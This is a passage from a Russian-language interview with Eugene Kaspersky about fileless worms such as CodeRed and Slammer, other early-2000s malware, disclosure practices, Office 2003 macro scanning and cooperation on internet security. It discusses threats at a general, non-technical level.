вмешательства человека. И защиты от этой напасти пока не видно... За объяснениями мы обратились к руководителю антивирусных исследований "Лаборатории Касперского", Евгению Касперскому.

TanaT: Евгений, вы не могли бы немного прояснить ситуацию с бестелесными червями: в какой форме они существуют, каковы их принципы действия и на что они способны?

Евгений Касперский: Бестелесные черви впервые появились летом 2001 года, когда была зарегистрирована вспышка эпидемии печально известного CodeRed. Смысл этого типа вредоносных программ наглядно объясняется его названием. В отличие от "одноклассников", бестелесные черви в процессе заражения и распространения не используют ни временных, ни постоянных файлов. Они пробираются на компьютеры через бреши в системах безопасности и существуют исключительно в виде пакетов данных, передаваемых по коммуникационным каналам, или в виде программного кода в памяти зараженного компьютера.

TanaT: Много ли бестелесных червей существует на сегодняшний день?

Евгений Касперский: Парадоксально, но количество известных бестелесных червей абсолютно непропорционально уделяемому им вниманию, хотя и заслуженному. Известно всего лишь несколько модификаций CodeRed и недавно нашумевший, печально известный Slammer.

TanaT: То есть на сегодня существует два различных бестелесных вируса (Code Red и Slammer) и несколько их клонов. Я правильно понял?

Евгений Касперский: Точно.

TanaT: Бестелесные черви - это повод беспокоиться за будущее? Они открывают что-нибудь новое и сверх опасное для мира Глобальной Сети? Или это всего лишь очередной виток эволюции вредных кодов?

Евгений Касперский: Как я сказал выше, несмотря на малочисленность популяции бестелесных червей, ее опасность трудно переоценить. Главная проблема заключается в том, что скорость распространения этих червей гораздо выше, чем скорость реакции антивирусных компаний. Черви данного типа распространяются со скоростью Интернета, то есть такой "замедлитель" распространения вирусных эпидемий как человек не присутствует в цепочке распространения вируса (не надо запускать зараженный файл, не надо кликать по вложению и т. п. - вирус запускает себя сам в момент проникновения на компьютер-жертву). Скорость же реакции антивирусников - это скорость работы человеческого ума и пальцев, стучащих по клавиатуре, а эта скорость значительно уступает молниеносным интернет-эпидемиям бестелесных червей.

Таким образом, даже если в качестве решения скрестить обычный антивирус с брандмауэром и проверять на вирусы пакеты, которые будут поступать на компьютер, всё равно "пилюля" от антивирусников выйдет позже того момента, когда распространится новый бестелесный вирус. Это именно та "инфекция", которая способна парализовать Интернет за считанные минуты. Самое красноречивое подтверждение такому заключению - январская эпидемия Slammers.

На сегодняшний день профилактика, пожалуй, остается самым надежным средством противостояния подобным угрозам: своевременная установка заплаток для брешей, через которые бестелесные черви заражают компьютеры; соответствующая настройка межсетевых экранов корпоративного уровня и прочие мероприятия по улучшению устойчивости корпоративной сети. Тем не менее, нужно отдавать себе отчет в том, что это решение не абсолютно, брешей в системах безопасности очень много, а отследить всю информацию о них крайне сложно. Проблема защиты от бестелесных червей, действительно, очень актуальна.

TanaT: Не могли бы вы рассказать о новых технологиях, которые вирусописатели применяют в своих кодах? К примеру, недавний червь Sobig для увеличения эффективности своего распространения использовал спам-технологии. Есть ли еще какие-нибудь примеры?

Евгений Касперский: Прежде всего, я хотел бы уточнить. Червь для своего распространения не использовал спамерских технологий, в его коде нет ничего, что позволяло бы об этом говорить. Однако анализ технических возможностей этой вредоносной программы и темпы его распространения позволяют нам предположить, что его автор был знаком с технологией рассылки спама и с большой долей вероятности воспользовался спамерскими способами для рассылки своего сетевого червя.

Я бы не хотел превращать наш разговор в описание вирусных технологий, поэтому позволю себе ограничиться лишь несколькими примерами. Во-первых, это Slammer (или Helkern), который нарушил спокойствие пользователей Интернет в январе этого года. Этот червь незаметно проникал на компьютеры через брешь класса "переполнение буфера" (Buffer Overrun) в системе безопасности Microsoft SQL Server. Другой, более ранний пример - червь Opasoft, который заражал компьютеры под управлением Windows 95/98/ME, используя коммуникационные порты (порт 137 и 139), применяемые в Windows-сетях для обмена информацией.

TanaT: Сейчас многие обеспокоены новой версией червя Tanatos. Согласно данным "Лаборатории Касперского" червь "обладает опасной деструктивной функцией заражения файлов на жестком диске компьютера". В более подробном описании сказано: "Данная версия вредоносной программы обладает рядом опасных функций. В частности, она способна заражать исполняемые файлы многих программ, хранящихся на жестком диске, а также спровоцировать утечку конфиденциальной информации с зараженного компьютера". Можете объяснить подробно: разве червю не все равно, какой программе принадлежит тот или иной исполняемый файл?

Евгений Касперский: На сегодняшний момент существует не так много сетевых червей, которые умеют заражать исполняемые файлы. Алгоритм процедуры заражения сложный, и у каждой вредоносной программы - свой. Так, Tanatos, например, ищет определенное имя файла и, найдя его, заражает соответствующий файл. То есть заражению подвергаются только определенные исполняемые файлы.

TanaT: Некоторое время назад стояла большая шумиха по поводу червя Fizzer. Чем вызвана такая популярность этого представителя компьютерной "фауны"?

Евгений Касперский: В общем-то, это классический сетевой червь, распространяющийся по каналам Интернет. Многовекторность, то есть использование нескольких различных способов распространения, - это его отличительная, однако не уникальная особенность. Помимо рассылки по электронной почте, данная вредоносная программа содержала процедуры рассылки через P2P-сеть KaZaA. Кроме того, Fizzer обладал функциональностью backdoor-программы: мог установить клавиатурного "жучка" и троянца для удаленного управления зараженным компьютером. Антивирусные специалисты вовремя проинформировали пользователей о потенциальной угрозе, что в результате не позволило червю нанести серьезного ущерба. По нашей статистике он был четвертым в мае по количеству заражений в сети, однако с большим отрывом от тройки лидеров (после Sobig (22%), Lentin (16%) и Klez (15%) он следовал со всего лишь 0,7% от общего числа заражений).

TanaT: В феврале 2003 года по СМИ прокатилась информация, что вы и некоторые другие антивирусные эксперты заранее знали об опасности вирусов, использующих бреши в защите ПО и размножающихся без "помощи" пользователя. По слухам, вы не только знали, но и специально скрывали эту информацию, чтобы не натолкнуть вирусмейкеров на новое оружие. Это действительно так?

Евгений Касперский: Давайте разделять факты и идеи. В вопросе затрагивается две серьезные проблемы, которые необходимо осветить отдельно. Прежде всего, да, мы действительно давно знали о возможности подобных эпидемий, но сознательно не раскрывали методов их практической реализации, чтобы не стать невольными учителями вирусописателей. Вместо этого мы многократно предупреждали пользователей об угрозе и предлагали конкретные идеи по ее предотвращению.

Мы и сейчас знаем о новых реальных способах реализации глобальных вирусных эпидемий с тяжелыми последствиями, но информируем о них только узкий круг ИТ-специалистов, то есть тех, кто может решить проблему прежде, чем она станет глобальной. Например, разработчиков программного обеспечения, в котором обнаружена серьезная брешь в системе безопасности. К сожалению, в Сети есть много несознательных личностей, которых подобная информация, стань она публичной, спровоцировала бы на очередные кибер-"подвиги".

Другая сторона вопроса - заявление компании Symantec, что они действительно зарегистрировали растущие обороты эпидемии, но вовремя не оповестили об этом общественность. Если это правда, то это, конечно, малоприятный факт в деятельности компании, занимающейся безопасностью.

TanaT: Как вы думаете, а что произошло в Symantec? Ведь не каждый день эта компания признается в собственных ошибках…

Евгений Касперский: Я не располагаю информацией о том, что действительно случилось в Symantec, могу только предположить. На мой взгляд, в Symantec произошла серьезная накладка в работе информационного отдела компании, который по ошибке выдал некорректную информацию. В частности, было сказано, что компания якобы знала за некоторое время о том, что пошла эпидемия. На самом деле, наиболее вероятным было следующее: так называемые сетевые "липучки" (специальные сервера, которые мониторят атаки в Сети) в какой-то момент начали фиксировать рост SQL-запросов. Но это рабочий момент в рутинном анализе вирусной активности в Сети любой антивирусной компании, большое количество запросов необязательно свидетельствует о начале эпидемии. Мы, например, тоже зафиксировали это. Вообще, ежедневно регистрируются сотни подозрительных вещей в Сети, все они анализируются специалистами. Публичной становится информация после экспертного анализа, и лишь та, которая действительно важна для безопасности пользователей. Ведь если сигнализировать о рутине, то когда "придет настоящий волк", никто не поверит. Похоже, информационный отдел Symantec хотел похвастаться тем, что якобы раньше всех узнал об опасности, а получилось некрасивая ситуация: раз знал, зачем молчал? Поэтому и пришлось потом признать свою оплошность. Есть другой вариант развития событий: представители информационного отдела просто перепутали SQL-червя с SQL-эксплоитом, то есть с собственно примером использования этой SQL-дыры. Информация об этом эксплоите была опубликована в Сети задолго до появления червя и была известна всем, и Symantec в том числе.

TanaT: Не хотелось бы вас задеть, но все-таки, наверное, каждый может утверждать после какой-то катастрофы: "Я знал об этом, но никому не говорил". Можете прокомментировать?

Евгений Касперский: В действительности, мы не только знали, но и говорили. В 2001 г. мы неоднократно заявляли об опасности бестелесных червей и других способов глобальных атак, которые способны поставить Интернет на колени. В период 2002-2003 мы бессчетное количество раз твердили о потенциальной опасности. Кто-то смеялся, кто-то обвинял в паникерстве. И вдруг в октябре прошлого года случилась "первая ласточка" - атака на "хребет" Интернета. В январе "взорвался" Slammer. Первое событие замедлило всемирную сеть на 6%, второе на 25%. Дальше будет хуже, ящик Пандоры открыт. И причина такого развития событий в полной анархии, поглотившей Интернет.

TanaT: Есть ли какие-нибудь способы профилактики этой угрозы?

Евгений Касперский: Решение, как я уже неоднократно говорил, - безопасный, не анонимный Интернет. Интернет - это публичная сеть, такая же как автодороги, например. Представьте, если бы сейчас отменили все ПДД, права, знаки…Я, вы и практически все вокруг ездили бы, как и прежде. А какой-нибудь десятый или даже сотый процент автовладельцев воспользовался бы ситуацией и начал просто "хулиганить". Так вот, из-за этого маленького процента ездить нам с вами стало бы не просто небезопасно, а невозможно. И никакая профилактика бы не помогла.

TanaT: Под "не анонимным Интернетом" вы понимаете статические идентификационные номера?

Евгений Касперский: Я предпочитаю использовать антоним "неанонимности" - персонифицированность. Этот термин предусматривает несение субъектом ответственности за противоправные действия, причем для идентификации субъекта необходимо использовать его личный, максимально защищенный электронный "паспорт". Последнее вполне можно назвать синонимом "статических идентификационных номеров".

TanaT: Может ли быть такая ситуация, что создан "незаметный" вирус, размножающийся через уязвимости в ПО, без каких бы то ни было вредоносных эффектов? То есть он спокойно "ходит по планете", никого не трогает и никто его не замечает.

Евгений Касперский: Уже само его "хождение по планете" и есть вредоносный эффект. Возьмите, к примеру, СodeRed или Slammer. Они ведь ничего не уничтожали и не похищали. Они просто "ходили". Но "ходили" так, что своим избыточным трафиком перекрывали международные каналы передачи данных. То есть любой "незаметный" вирус будет замечен по мере нарастания эпидемии.

TanaT: Не кажется ли Вам, что вредные коды, распространяющиеся через "дыры" в ПО, открывают новый аспект в применении вирусов в реальных войнах? К примеру, если бы одна сторона гипотетического конфликта вовремя перевела свои базы данных с MS SQL Server на какую-нибудь другую СУБД, то она бы стала неуязвима для Helkern. То есть эффект бумеранга, когда вредный код, выпущенный в Сеть, поражает и свои приложения и чужие, будет ликвидирован.

Евгений Касперский: Теоретически это возможно, но практически - маловероятно. Можно представить, конечно, изолированное тоталитарное государство без союзников и с жесткой дисциплиной в области централизованной ИТ-политики. Но в реальной жизни я такого не встречал.

TanaT: Евгений, скажите, пожалуйста, а при анализе вирусов вы пользуетесь своими собственными инструментами или известными отладчиками и дизассемблерами? Может у вас есть свои ноу-хау инструменты?

Евгений Касперский: И то, и другое. Мы используем и разнообразные отладчики (например, "SoftICE"), используем и достаточно известный дизассемблер "IDA". Помимо этих инструментов мы активно используем и собственные утилиты, очень помогающие нам "вскрывать" и анализировать обнаруженные вредоносные программы. Однако распространяться о том, что это за утилиты, на каких принципах они действуют, мне бы не хотелось. Считайте это нашим профессиональным секретом.

TanaT: Помимо Helkern, хотелось бы обсудить с вами еще одну новость: скоро появится (уже появилась вторая бета-версия) Microsoft Office 2003, а он, судя по прогнозам, будет активно использовать XML. Многие волнуются, что в этом случае антивирусам станет намного сложнее отлавливать и детектировать макровирусы (так как XML достаточно демократичен, он не регламентирует никаких правил и ограничений на макросы). Можете успокоить или угроза действительно реальная?

Евгений Касперский: После выхода беты Office 11 (Office 2003) антивирусные компании, что называется, схватились за головы. Изменение формата документов Office в XML означало, что для отлова макро-вируса в документе надо сканировать весь документ от начала до конца. То есть все мегабайты документа с первого по самый сто-какой-то. Представляете, какая будет производительность у антивирусных программ?

К чести Microsoft надо сказать, что они серьезно отнесли к возникшей проблеме и учли важность добавления необходимой информации о наличии макросов в заголовок XML-документов. Зная внимательность и ответственность Microsoft в отношении подобных рабочих моментов, я смею надеяться, что они будут строго следовать данному улучшенному формату.

TanaT: То есть пользователи могут спать спокойно?

Евгений Касперский: Спать спокойно с надеждой на лучшее.

TanaT: Очевидно, что ПО без ошибок и уязвимостей не бывает. Многие "дыры" еще не открыты и для них не существует сервис паков. Получается, что если вирусмейкер "откопает" брешь в защите раньше производителя и напишет вирус, то любой пользователь, какое бы хорошее антивирусное ПО он ни использовал, будет просто-напросто беззащитен?

Евгений Касперский: Такое развитие событий нельзя исключать. Да, теоретически можно создать вирус, использующий брешь без патча, и который обходит антивирусные программы, поскольку на момент запуска вируса они просто не знают о такой угрозе.

Однако я бы не стал устраивать по этому поводу паники. Во-первых, для того, чтобы обнаружить новую дыру и написать соответствующий вирус, нужна соответствующая квалификация, а у вирусописателей ее попросту нет. Ведь в основном, это подростки, а их вирусы - сомнительный способ самореализации в период полового созревания. Во-вторых, на страже безопасности пользователей стоят сотни высококлассных экспертов по всему миру, задача которых - отслеживать возможные бреши в системах безопасности собственного ПО и выпускать соответствующие патчи. Тем не менее, в конце мая все-таки случился первый прецедент, когда для обнаруженной за два месяца до этого дыры в системе безопасности была написана вредоносная программа, а патча еще не существовало. Это был троянская программа StartPage, которая запускала себя абсолютно незаметно для пользователя, используя для этого брешь "Exploit.SelfExecHtml" в системе безопасности Internet Explorer. К счастью, StartPage является довольно безопасной программой. Среди ее побочных действий - модификация стартовой страницы Internet Explorer на сайт "взрослого" содержания. Естественно, мы оперативно разработали защиту и сообщили Microsoft об опасности. Хочется верить, что этот случай останется уникальным. В общем, будем надеяться на лучшее... но готовиться к худшему.

TanaT: Расскажите, пожалуйста, о недавно проведенном Ассоциацией Документальной Электросвязи совещании с участием крупнейших компаний-провайдеров. Какую роль там играла "Лаборатория Касперского"?

Евгений Касперский: За последнее время АДЭ предпринимает шаги по решению сразу нескольких проблем в существующем кибер-пространстве России. Во-первых, это вопрос о безопасности в сети, во-вторых - проблема спама. "Лаборатория" в свое время выступила инициатором встречи по проблеме безопасности. Ассоциация откликнулась на нашу идею, пригласив на беседу представителей ИТ-компаний и государственных структур, а также специалистов по информационной безопасности. Встреча оказалась полезной, была организована рабочая группа по разработке документов проекта, которые носят образовательный и рекомендательный характер. Хочется верить, что они помогут российским предприятиям и государственным структурам правильно выстроить защиту собственной информации и минимизировать, таким образом, вероятность успешной атаки. Надеюсь, что совместными усилиями мы сможем снизить уровень активности вредоносных программ в сети. Что же касается проблемы спама, то, действительно, планируется организовать встречу с провайдерами интернет-услуг. Надеюсь, что и это проект АДЭ получит дальнейшее развитие.

TanaT: А в чем на практике выльется сотрудничество ИТ-компаний и госструктур? Какие есть возможные варианты и идеи? Вы обмолвились "была организована рабочая группа по разработке документов проекта, которые носят образовательный и рекомендательный характер". Значит ли это, что будут выработаны лишь рекомендательные документы или за словом "проект" стоит что-то действительно реальное?

Евгений Касперский: Проект только начался и, в настоящий момент речь идет именно о создании ряда "рекомендательных" и "образовательных" документов. Но вы зря недооцениваете их значение. Для многих государственных и коммерческих структур он может стать "руководством" по обеспечению безопасной работы в Интернет. Прекрасно, когда в компании или организации есть отдел информационной безопасности, и его сотрудники обеспечивают бесперебойную работу всей информационной сети. Однако, к сожалению, это далеко не везде и не всегда так. Многим компаниям и государственным структурам не хватает опыта самостоятельно организовать свою безопасность, а средства на приглашение специалистов по ИТ-консалтингу не всегда есть. В результате предприятия и организации становятся жертвами атак кибер-преступников и хулиганов, а вместе с ними часто страдают и их клиенты, которые могут быть вовсе не связаны с Интернет. Пример - эпидемия "Slammer" (другое название Helkern) в январе: тогда в некоторых странах какое-то время не работали банки, не предоставляли услуги телефонные операторы. Сетевой червь нарушил жизнь тысяч людей, которые не могли снять деньги с карты или дозвониться. А случиться могут и более серьезные вещи.

В рабочей группе сегодня работают настоящие специалисты в области безопасности, которые вместе, аккумулируя собственный опыт, пытаются выработать комплекс мер по организации безопасности информации, в том числе и некие стандарты пользования каналами передачи данных. Не думаю, что в качестве главной цели проекта нужно рассматривать физическое изменение Интернета. Это высокобюджетный и технологически сложный процесс. Я неоднократно говорил, мы не специалисты по организации параллельных сетей, и это не наша задача. Но антивирусные эксперты могут привлечь к проблеме внимание Интернет-сообщества, поделиться собственным опытом, повысив тем самым общий уровень просвещенности в сфере компьютерных технологий и, надеюсь, не допустить полной деградации интернета.

seo & website usability   inet   html   os faq   hardware faq   memory   video   cpu   hdd   mainboard faq   printer & scaner   modem   mobiles

На главную | Cookie policy | Sitemap